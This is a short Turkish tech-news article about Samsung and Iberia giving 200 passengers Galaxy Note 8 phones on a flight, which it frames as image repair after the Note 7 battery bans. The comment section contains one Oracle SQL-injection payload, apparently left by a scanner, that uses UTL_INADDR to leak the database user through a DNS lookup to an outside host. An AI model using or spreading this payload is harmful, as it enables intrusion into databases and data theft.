Uçaktaki Yolculara Galaxy Note 8 Hediye Edildi!

Evet yanlış duymadınız uçakta yolculara toplam 200 adet Galaxy Note 8 hediye edildi. İşte detaylar...
24 Ekim 2017 17:13
Uçaktaki Yolculara Galaxy Note 8 Hediye Edildi!
Başlık gerçekten şaşırtıcı ama gerçek! Samsung, 200 adet Galaxy Note 8 modelini bir uçuş sırasında hediye etti. 
 
 
Uçakta 200 Galaxy Note 8 hediye edildi!
 
Geçtiğimi yıl Galaxy Note 7 yüzünden yaşadığı sorunlarla ve özellikle havaalanlarındaki anonslarla büyük prestij kaybı yaşayan Samsung, bu durumu farklı bir yol ile unutturmak niyetinde. İspanya’da başlayan bu operasyon ile Iberia Havayolları’nın bir uçuşu sırasında kabin görevlileri 200 yolcuya Galaxy Note 8 hediye etti.
 
 
Kutunun üzerinde ise “Bir yıl önce telefonlarınızı kapatmanızı istemiştik ancak şimdi biz sizlere sunuyoruz” mesajı ile dağıtılan Note 8’ler yolcular arasında çok büyük bir şaşkınlıkla karşılandı.
 
 
Geçtiğimi yıl batarya sorunu nedeniyle uçaklarda yasaklanan ve hatta anonslarla akıllara kazınan Note 7 sorunlarının ardından Samsung İspanya ve Iberia Havayolları işbirliği ile gerçekleştirilen bu çalışma büyük ses getirecek gibi görünüyor.
 
 
Duygusal yapay zeka hayatımıza giriyor
 
Diğer ülkelerde de benzer bir çalışma yapılır mı? Galaxy Note 7 ile sarsılan imajı güçlendirmek adına başka ne gibi çalışmalar karşımıza çıkacak zaman içinde göreceğiz.
 
 
 
shiftdelete
674902
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
24 Ekim 2017, Salı 17:24
böyle şeyler neden bize hiç denk gelmez
Bu haberler ilginizi çekebilir